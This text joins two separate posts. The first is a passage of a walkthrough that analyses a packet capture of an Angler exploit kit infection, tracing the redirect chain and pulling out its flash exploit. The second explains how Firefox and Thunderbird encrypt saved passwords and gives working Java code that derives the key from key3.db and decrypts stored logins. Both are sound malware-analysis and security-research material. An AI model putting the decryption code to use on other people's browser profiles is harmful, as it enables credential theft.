Also limit your wireshark view to http requests by using the filter http.request. With a quick glance at wireshark we can see that the only client throughout the capture is 192.168.137.62 so we can assume that this is the compromised client; however, to prove this we can look at CapTipper. Scrolling through my eyes were drawn to request 52 since CapTipper thinks a binary was dropped. Lets hexdump it to see whats up there. The syntax is hexdump <req> <number of bytes>.  I dumped just the header and suprise where the magic number for an executable should be there are some seemingly random numbers and the usual string is not there. This indicates the binary is encrypted (most likely with a simple xor). Knowing that makes it extremely likely that this is the exploit kit's payload. For further confirmation I dumped about 2000 bytes. Here we see something strange at around 0550 and at 0700. Signatures like this are often listed by researchers so lets do a little google magic. I found this link: http://malware.dontneedcoffee.com/2014/08/angler-ek-now-capable-of-fileless.html which indicates that this is the xor key for Angler EK so we could decrypt this binary if we wanted to using xortools, but this confirms that this host is the malicious site. Type info 52 to find out information about the request that lead to the download. So looks like qwe.mvdunalterableairreport.net is the host. Now we should go about finding the landing page. To do that we should find the first time the client hits that host. Type hosts into captipper and find qwe.mvdunalterableairreport.net. You should see that 49 is the first request to the EK. To confirm that this is the landing page we should dump this to a file. First we have to expand the file since it was compressed, the syntax for that is ungzip <req>. The syntax to dump a request is dump <obj> <dump file>. Dump the object that CapTipper created, but be careful and dump it with a different extention to html to avoid accidentally infecting yourself just in case (I believe the host is down but I have not checked). Open the file in a text editor and you will see something strange. If you are not familiar with  Angler the strange text at the top might confuse you. These strange headers are often included on Angler landing pages. The obfuscated script at line 200 further confirms that his is the landing page. You can use jsbeautify to get a better look at the script.
 
Extraction and deobfuscation:
Alright lets drill down on one of the exploits it tried to serve up. Lets look at the flash exploit since it takes more effort to extract than the html exploit. Dump 63 since that is the swf that the host serves up. Now you need JPEX to decompile the swf. First you need to decompress it which can be done with ffdec -decompress <infile> <outfile>. Then you can export the scripts and elements of the flash file by using ffdec -export all <outdirectory> <infile  (outfile from before)>. To make this exploit usable we would have to deobfuscate the actionscript which is quite complex and I am not nearly qualified to try to teach the process as I am not sure I could deobfuscate it myself. If people want to post some sources or advise on that topic that would be great.
 
General Attack Flow:
After drilling down now we can zoom back out and look at the general flow of the attack using wireshark. Looking at the first couple requests, the host visits google then searches earsurgery.org and clicks on the link. That traffic is pretty normal. Now that we hit earsurgery.org we see it has the client make a bunch of GET requests. I found it easier to work backwards in this case. So lets click on the landing page (first request to qwe.mvdunalterableairreport.net) and open up the HTTP Headers. Looking at the headers we can see that the referrer is lifeinsidedetroit.com. Getting the referrer to that it looks like adstairs.ro redirected to lifeinsidedetroit which redirects to the exploit kit. Looking at adstairs.ro we can see that it was loaded by www.earsurgery.org. So the path of the client looks like www.earsurgery.org -> adstairs.ro  -> lifeinsidedetroit.com-> qwe.mvdunalterableairreport.net. Looking at this we can hypothesize that www.earsurgery.org was compromised but lets confirm that by looking at the source of earsurgery.org. For some reason CapTipper does not get the index html for me so I just clicked on the first GET on earsurgery.org and followed the tcp stream. Save the response and open it up in your preferred editor. Then search for that adstairs url we found earlier. You should find a flash object that is setup that embeds the adstairs.ro script. Honestly at first when I only saw the traffic flow I thought it was malvertising but looking at the source it appears that the website was actually hacked by some method and the attackers made their url look similar to an ad site to try to delay detection. I did some more analysis to determine how the load balancing was working but it is more of the same so I'll just summarize.  The way the exploit kit authors do this is strange. The adstairs swf loads content from the url that is passed to it in the FlashVars I think this is to allow for malleability and usability. You can think of the swf hosted at adstairs to literally be a shell that is filled with whatever content is passed to it. That content is retrieved from lifeinsidedetriot. That domain's php script acts as the loadbalancer and the strings that are passed to it are used to separate different compromised urls etc. Now this next conclusion is mere speculation but I suspect that the attackers who compromised the site and own adstairs.ro are simply costumers of the EK's host so the load balancer also acts to separate customers so that the proper binary is deployed.
 
 
  BYE!

Mozilla's Password Saving Truth

How Mozilla Saves Password

I searched for open-source programs that recover passwords from Firefox or Thunderbird and found this: http://securityxploded.com/thunderbirdpassdecryptor.php
Old website entries told me it was open-source, but I couldn't find any source to download. Old postings in the forum of securityxploded told me, that they changed this. Some people had used their code for writing maleware, so antivirus scanner recognized their program as a virus. It is pretty sad that the lazyness (not writing their own code, just grieving) and improvidence of some people forced the authors of ThunderbirdPassDecryptor to hide their knowledge. The further search for open-source programs was not fruitful.

In fact, signons.sqlite is useless without the key3.db file, which also resides in the profile folder of your application. This is where the trouble began. I couldn't find information about that file for a long time, so I downloaded the source code of Thunderbird, looked into it for several days and learned more about it's inner workings. I discovered that the login data in the signons.sqlite file is encrypted with TripleDES in CBC mode. The key used for the encryption is saved in key3.db and encrypted as well.

One day I stumbled on this website and it helped me a lot: http://www.drh-consultancy.demon.co.uk/key3.html
It describes how the keys in key3.db can be obtained. But not everything is correct anymore. Some changes are necessary.

First thing that made me think:

Quote

Initially you will need the database password

Where do I get that from?
I just guessed that this is the master password and was right.

I also got the idea that the entry values should follow right after the entry name (I am not sure if it is standard knowledge to do it in another way). I.e. looking at the key3.db in a hex editor you might get that picture on the plain text side:

...................password-check.Version..........

Which means the password-check entry would only have a one byte value. That couldn't be true. But the version entry which follows right after, only has a one byte value. So I tried it backwards, with the entry name following it's value (which lead to the problem to find out where the entries start). It was still not enough to get it working.

Since this website provides some test vectors (I am very grateful for that), I was able to implement and verify the decryption algorithm. Now I knew that it worked with the data on this website, but it still didn't work with my own key3.db file.
I can't really say how I got the idea, but I changed the length of the global salt entry from 16 bytes to 20 bytes. I guess it was just out of a hunch while looking at the hex values. Surprisingly this was the right thing. My test output decrypted the string "password-check" and I was happy. This is how I got the main algorithm for checking if a master password is the right one.

I still didn't implement a program for obtaining the login data out of signons.sqlite, once you got the key entries from key3.db. But my hunger for knowing how it works is satisfied and implementing it shouldn't be necessary at all. Reason: Thunderbird and Firefox show you the data (passwords included) in plaintext, if you know the master password. If no master password is given, the data is not secured at all, just encrypted with a hardcoded key: http://www.infond.fr/2010/04/firefox-passwords-management-leaks.html
(I didn't verify this yet, but I will)

How Mozilla saves login data:

Summary: login data is saved in signons.sqlite. It is encoded in Base64, encrypted with TripleDES in CBC mode and standard block padding. The key for the decryption is saved in key3.db. The entries in key3.db are encrypted with the master password. The decryption algorithm (of the key3.db entries) is not straight forward, but shown right after.

Sqlite Format: http://www.sqlite.org/fileformat2.html

Netscape Communicator Key Database Format: http://www.drh-consultancy.demon.co.uk/key3.html

Work through this description, but change the following:

• the global salt value is 20 bytes (not 16 bytes) long (I think there may be a value indicating the length of the global salt somewhere)
• the plain text entry names (i.e. Version, global salt) follow after their values
• the database password is the master password

To verify the master password and your decryption algorithm, use the check-password entry. Its value is the encrypted string "check-password".

Java example code: extracted from MozillaRecovery

Key3.db key derivation algorithm:

The comments are in the notation of the website mentioned above.

Code: Java

1. private static String decrypt(byte[] password, byte[] es, byte[] gs, byte[] text) {
2.         try {
3.             // HP = SHA1(global-salt||password)
4.             byte[] hp = SHA.sha1(appendArray(gs, password));
5.             byte[] pes = Arrays.copyOf(es, 20);
6.             // CHP = SHA1(HP||ES)
7.             byte[] chp = SHA.sha1(appendArray(hp, es));
8.             // k1 = CHMAC(PES||ES)
9.             byte[] k1 = SHA.sha1Hmac(appendArray(pes, es), chp);
10.             // tk = CHMAC(PES)
11.             byte[] tk = SHA.sha1Hmac(pes, chp);
12.             // k2 = CHMAC(tk||ES)
13.             byte[] k2 = SHA.sha1Hmac(appendArray(tk, es), chp);
14.             // k = k1||k2
15.             byte[] k = appendArray(k1, k2);
16.             byte[] desKey = Arrays.copyOf(k, 24);
17.             byte[] desIV = Arrays.copyOfRange(k, k.length - 8, k.length);
18.             return new TripleDES(desKey, desIV).decrypt(text);
19.         } catch (NoSuchAlgorithmException e) {
20.             logger.fatal(e.getMessage());
21.             e.printStackTrace();
22.         } catch (BadPaddingException e) {
23.             logger.debug(e.getMessage() + ". Probably wrong key.");
24.         }
25.         return null;
26.     }

SHA-1 and HMAC-SHA1:

Code: Java

1. import java.security.InvalidKeyException;
2. import java.security.MessageDigest;
3. import java.security.NoSuchAlgorithmException;
4.  
5. import javax.crypto.Mac;
6. import javax.crypto.spec.SecretKeySpec;
7.  
8. public class SHA {
9.  
10.     private static final String HMAC_SHA1_ALGORITHM = "HmacSHA1";
11.     private static final String SHA1_ALGORITHM = "SHA-1";
12.  
13.     public static byte[] sha1Hmac(byte[] data, byte[] key) {
14.         try {
15.             SecretKeySpec signingKey = new SecretKeySpec(key,
16.                     HMAC_SHA1_ALGORITHM);
17.             Mac mac = Mac.getInstance(HMAC_SHA1_ALGORITHM);
18.             mac.init(signingKey);
19.             return mac.doFinal(data);
20.         } catch (NoSuchAlgorithmException | InvalidKeyException e) {
21.             e.printStackTrace();
22.         }
23.         return null;
24.  
25.     }
26.    
27.     public static byte[] sha1(byte[] text) throws NoSuchAlgorithmException {
28.         MessageDigest md = MessageDigest.getInstance(SHA1_ALGORITHM);
29.         md.update(text, 0, text.length);
30.         return md.digest();
31.     }
32. }}

TripleDES:

Code: Java

1. import java.io.UnsupportedEncodingException;
2. import java.security.InvalidAlgorithmParameterException;
3. import java.security.InvalidKeyException;
4. import java.security.NoSuchAlgorithmException;
5. import java.security.NoSuchProviderException;
6. import java.security.spec.InvalidKeySpecException;
7. import java.security.spec.KeySpec;
8.  
9. import javax.crypto.BadPaddingException;
10. import javax.crypto.Cipher;
11. import javax.crypto.IllegalBlockSizeException;
12. import javax.crypto.NoSuchPaddingException;
13. import javax.crypto.SecretKey;
14. import javax.crypto.SecretKeyFactory;
15. import javax.crypto.spec.DESedeKeySpec;
16. import javax.crypto.spec.IvParameterSpec;
17.  
18. public class TripleDES {
19.     private KeySpec keySpec;
20.     private SecretKey key;
21.     private IvParameterSpec iv;
22.  
23.     public TripleDES(byte[] keyBytes, byte[] ivString) {
24.         try {
25.             keySpec = new DESedeKeySpec(keyBytes);
26.             key = SecretKeyFactory.getInstance("DESede")
27.                     .generateSecret(keySpec);
28.             iv = new IvParameterSpec(ivString);
29.         } catch (InvalidKeySpecException | NoSuchAlgorithmException
30.                 | InvalidKeyException e) {
31.             e.printStackTrace();
32.         }
33.  
34.     }
35.  
36.     public byte[] encrypt(byte[] text) {
37.         if (text != null) {
38.             try {
39.                 Cipher cipher = Cipher.getInstance("DESede/CBC/PKCS5Padding",
40.                         "SunJCE");
41.                 cipher.init(Cipher.ENCRYPT_MODE, key, iv);
42.                 return cipher.doFinal(text);
43.             } catch (IllegalBlockSizeException | InvalidKeyException
44.                     | InvalidAlgorithmParameterException
45.                     | NoSuchAlgorithmException | NoSuchProviderException
46.                     | NoSuchPaddingException | BadPaddingException e) {
47.                 e.printStackTrace();
48.             }
49.         }
50.  
51.         return null;
52.     }
53.  
54.     public String decrypt(byte[] text) throws BadPaddingException {
55.         if (text != null) {
56.             try {
57.                 Cipher cipher = Cipher.getInstance("DESede/CBC/PKCS5Padding",
58.                         "SunJCE");
59.                 cipher.init(Cipher.DECRYPT_MODE, key, iv);
60.                 byte[] result = cipher.doFinal(text);
61.                 return new String(result, "UTF8");
62.             } catch (NoSuchAlgorithmException | NoSuchProviderException
63.                     | NoSuchPaddingException | IllegalBlockSizeException
64.                     | InvalidKeyException | InvalidAlgorithmParameterException
65.                     | UnsupportedEncodingException e) {
66.                 e.printStackTrace();
67.             }
68.         }
69.         return null;
70.     }
71. }